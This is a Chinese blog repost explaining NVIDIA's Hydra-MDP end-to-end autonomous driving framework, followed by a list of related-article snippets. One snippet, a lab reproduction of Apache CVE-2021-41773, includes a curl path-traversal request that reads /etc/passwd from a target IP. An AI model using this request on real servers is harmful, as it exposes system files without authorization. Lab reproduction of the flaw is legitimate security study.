NVIDIA发布端到端自动驾驶框架Hydra-MDP

动图封面

自动驾驶是目前人工智能领域的一个主要分支,目前特斯拉的FSD确实是为数不多的大模型框架。与其说特斯拉是一个造车公司,不如说是一个人工智能大数据公司。特斯拉每天靠行驶在道路上的汽车搜集的道路数据不胜其数,而拥有海量的数据是人工智能领域成功的关键。

端到端自动驾驶的工作原理

自动驾驶汽车的开发竞赛不是短跑,而是一场永无止境的铁人三项赛,其中有三个不同但至关重要的部分组成:AI 训练、AI自动模拟和自动驾驶。每个部分都需要自己的加速计算平台,而专为这些步骤构建的全栈系统共同构成了一个强大的人工智能系统。

Hydra-MDP 提供了一个通用框架,展示了如何通过基于规则的规划器增强基于机器学习的规划。这种集成系统确保模型不仅模仿人类的驾驶行为,还遵守交通规则和安全标准,解决了传统模仿学习的局限性。Hydra-MDP 的数据驱动缩放定律证明了其稳健性和适应性。通过使用具有大量数据和 GPU 预训练基础模型,Hydra-MDP 展示了其可扩展性和持续改进的潜力。

为了实现这一点,首先在NVIDIA DGX等 AI 超级计算机上训练模型。然后使用NVIDIA Omniverse平台在NVIDIA OVX系统上运行,在模拟中对其进行测试和验证,最后进入正式的车辆系统中,NVIDIA DRIVE AGX平台通过模型实时处理传感器数据。

构建一个能够在复杂的物理世界中安全导航的自主系统极具挑战性。该系统需要全面感知和理解其周围环境,然后在几分之一秒内做出正确、安全的决策。这需要像人类一样的态势感知能力来处理潜在的危险或罕见情况。

AV 软件开发传统上基于模块化方法,具有用于对象检测和跟踪、轨迹预测以及路径规划和控制的独立组件。端到端自动驾驶系统使用统一模型接收传感器输入并生成车辆轨迹,从而简化这一过程,有助于避免过于复杂的系统,并提供更全面、数据驱动的方法来处理现实场景。

拥抱多模式和多目标规划的复杂性

一个基础教训是必须采用多模式和多目标规划。传统的端到端自动驾驶系统通常专注于单模态和单目标,限制了其在现实世界中的有效性。Hydra-MDP 集成了针对安全性、效率和舒适度等多项指标量身定制的多种轨迹。这确保了模型能够适应复杂的驾驶环境,而不仅仅是模仿人类驾驶员。

Hydra-MDP 架构

Hydra-MDP 的开发教会了NVIDIA几个重要的经验教训,这些经验教训塑造了Hydra-MDP 架构。Hydra-MDP 结合了人类和基于规则的知识提炼,创建了一个强大而多功能的自动驾驶模型。拥抱多模式和多目标规划的复杂性是自动驾驶的主要任务,不能仅仅局限于单目标,单模式的方式,而是学习人类的驾驶方式,处理多维度的数据,接受多目标规划的复杂性。

动图封面

多目标 Hydra-distillation 是一个师生多模式框架,是Hydra-MDP方法中的关键策略。通过聘用多位专业教师(包括人类和基于规则的教师),该模型学会预测符合各种基于模拟的自动驾驶轨迹。这种技术增强了模型在不同驾驶条件下的泛化能力。结合基于规则的规划器提供了一个结构化的框架,而人类教师则引入了适应性和细致的决策能力,这对于应对不可预测的情况至关重要。

传统方法通常会将感知和规划拆分为不同的、不可微分的步骤,从而丢失宝贵的信息。Hydra-MDP 的端到端架构将感知和规划无缝集成,并在整个决策过程中保持环境数据的丰富性。这种集成可实现更明智、更准确的预测。

Hydra-MDP 的感知网络以 Transfuser 基线为基础,结合了 LiDAR 和摄像头输入的功能。这种多模态融合有助于模型更好地理解和应对复杂的驾驶环境。

对整个训练数据集进行模拟可生成各种指标的真实模拟分数。然后,这些数据用于监督训练过程,使模型能够从各种模拟驾驶场景中学习。这一步强调了广泛的模拟对于弥合理论性能和实际适用性之间的差距的重要性。

Hydra-MDP采用了混合编码器和子分数集成等技术来整合模型优势。这提高了 Hydra-MDP 的稳健性,并确保最终模型能够高精度地处理各种驾驶场景。集成技术平衡了计算效率和性能,这对于实时应用至关重要。

Hydra-MDP 的开发是一个创新、实验和持续学习的过程。通过采用多模式和多目标规划、利用多目标蒸馏以及通过大量模拟数据进行改进,Hydra-MDP创建了一个性能远超现有最先进方法的模型。这些经验为 Hydra-MDP 的成功做出了贡献,并为未来自动驾驶的发展提供了宝贵的意见。

https://arxiv.org/html/2406.06978v1
https://developer.nvidia.com/
更多transformer,VIT,swin tranformer
参考头条号:人工智能研究所
v号:启示AI科技

 动画详解transformer  在线教程

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/430757.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

001.从0开始实现线性回归(pytorch)

000动手从0实现线性回归 0. 背景介绍 我们构造一个简单的人工训练数据集,它可以使我们能够直观比较学到的参数和真实的模型参数的区别。 设训练数据集样本数为1000,输入个数(特征数)为2。给定随机生成的批量样本特征 X∈R10002 …

第十四届蓝桥杯嵌入式国赛

一. 前言 本篇博客主要讲述十四届蓝桥杯嵌入式的国赛题目,包括STM32CubeMx的相关配置以及相关功能实现代码以及我在做题过程中所遇到的一些问题和总结收获。如果有兴趣的伙伴还可以去做做其它届的真题,可去 蓝桥云课 上搜索历届真题即可。 二. 题目概述 …

论文阅读与分析:Few-Shot Graph Learning for Molecular Property Prediction

论文阅读与分析:Few-Shot Graph Learning for Molecular Property Prediction 论文地址和代码地址1 摘要2 主要贡献3 基础知识Meta Learning1 介绍2 学习算法Step 1: What is learnable in a learning algorithm?Step 2:Define loss function for learn…

基于C语言开发(控制台)通讯录管理程序

通讯录程序设计 一、课程设计题目与要求 题目 :通讯录管理程序 1. 问题描述 编写一个简单的通讯录管理程序。通讯录记录有姓名,地址(省、市(县)、街道),电话号码,邮政编码等四项。2. 基本要求 程序应提供的基本基本管理功能有…

众数信科AI智能体政务服务解决方案——寻知智能笔录系统

政务服务解决方案 寻知智能笔录方案 融合民警口供录入与笔录生成需求 2分钟内生成笔录并提醒错漏 助办案人员二次询问 提升笔录质量和效率 寻知智能笔录系统 众数信科AI智能体 产品亮点 分析、理解行业知识和校验规则 AI实时提醒用户文书需注意部分 全文校验格式、内…

领域驱动DDD三种架构-分层架构、洋葱架构、六边形架构

博主介绍: 大家好,我是Yuperman,互联网宇宙厂经验,17年医疗健康行业的码拉松奔跑者,曾担任技术专家、架构师、研发总监负责和主导多个应用架构。 技术范围: 目前专注java体系,以及golang、.Net、…

(1999-2018年)全国各城市-财政收入–营业税

涵盖了1999年至2018年间,全国各城市的财政收入中营业税的部分。数据来源于中国区域统计年鉴及各省市统计年鉴 1999-2018年全国各城市-财政收入-营业税资源-CSDN文库https://download.csdn.net/download/2401_84585615/89504622 不同行业对营业税的贡献也存在差异。…

电动车车牌识别系统源码分享

电动车车牌识别检测系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义 项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer V…

Apache CVE-2021-41773 漏洞复现

1.打开环境 docker pull blueteamsteve/cve-2021-41773:no-cgid docker run -d -p 8080:80 97308de4753d 2.访问靶场 3.使用poc curl http://47.121.191.208:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 4.工具验证

智能新突破:AIOT 边缘计算网关让老旧水电表图像识别

数字化高速发展的时代,AIOT(人工智能物联网)技术正以惊人的速度改变着我们的生活和工作方式。而其中,AIOT 边缘计算网关凭借其强大的功能,成为了推动物联网发展的关键力量。 这款边缘计算网关拥有令人瞩目的 1T POS 算…

自驾游拼团系统小程序的设计

管理员账户功能包括:系统首页,个人中心,用户管理,发布起人管理,景点信息管理,景点分类管理,拼团旅游管理,参团信息管理,拼团订单管理,系统管理 微信端账号功…

11. DPO 微调示例:根据人类偏好优化LLM大语言模型

在部署大模型之后,我们必然要和微调打交道。现在大模型的微调有非常多的方法,过去的文章中提到的微调方法通常依赖于问题和答案对,标注成本较高。 2023 年所提出的 Direct Preference Optimization(DPO)为我们提供了一…

C语言----指针

基本知识点:指针的定义、指针运算符和指针运算等基本概念。重 点:字符指针、指针数组和多级指针。难 点:利用指针类型解决复杂的应用问题。 指针的概念 要点归纳 1.指针变量 在计算机中,所有数据都通过变量存放在内存中,每个变量都…

【matlab】将程序打包为exe文件(matlab r2023a为例)

文章目录 一、安装运行时环境1.1 安装1.2 简介 二、打包三、打包文件为什么很大 一、安装运行时环境 使用 Application Compiler 来将程序打包为exe,相当于你使用C编译器把C语言编译成可执行程序。 在matlab菜单栏–App下面可以看到Application Compiler。 或者在…

啤酒过滤——关于过滤助剂的介绍

在啤酒的酿造过程中,过滤是一个关键步骤,在啤酒厂中最常用的过滤助剂主要有两种:硅藻土和珍珠岩。它们能够帮助去除杂质,确保啤酒的清澈和口感。过滤助剂通常以粉状形式存在,它们被涂抹在过滤机的支撑材料上&#xff0…

深度合成算法备案和大模型备案的区别是什么

以下是关于大语言模型上线备案和深度合成算法备案区别的文档内容: 一、大语言模型上线备案与深度合成算法备案的区别 备案对象 大语言模型上线备案:主要针对生成式人工智能(AIGC)产品中的大型语言模型,能够生成文本、图…

MT6765/MT6762(R/D/M)/MT6761(MT8766)安卓核心板参数比较_MTK联发科4G智能模块

联发科Helio P35 MT6765安卓核心板 MediaTek Helio P35 MT6765是智能手机的主流ARM SoC,于2018年末推出。它在两个集群中集成了8个ARM Cortex-A53内核(big.LITTLE)。四个性能内核的频率高达2.3GHz。集成显卡为PowerVR GE8320,频率…

MATLAB系列09:图形句柄

MATLAB系列09:图形句柄 9. 图形句柄9.1 MATLAB图形系统9.2 对象句柄9.3 对象属性的检测和更改9.3.1 在创建对象时改变对象的属性9.3.2 对象创建后改变对象的属性 9.4 用 set 函数列出可能属性值9.5 自定义数据9.6 对象查找9.7 用鼠标选择对象9.8 位置和单位9.8.1 图…

Leetcode面试经典150题-39.组合总数进阶:40.组合总和II

本题是扩展题,真实考过,看这个题之前先看一下39题 Leetcode面试经典150题-39.组合总数-CSDN博客 给定一个候选人编号的集合 candidates 和一个目标数 target ,找出 candidates 中所有可以使数字和为 target 的组合。 candidates 中的每个数…

E2VPT: An Effective and Efficient Approach for Visual Prompt Tuning

论文汇总 存在的问题 1.以前的提示微调方法那样只关注修改输入,而应该明确地研究在微调过程中改进自注意机制的潜力,并探索参数效率的极限。 2.探索参数效率的极值来减少可调参数的数量? 解决办法 提示嵌入进行transformer中 提示剪枝 Token-wise …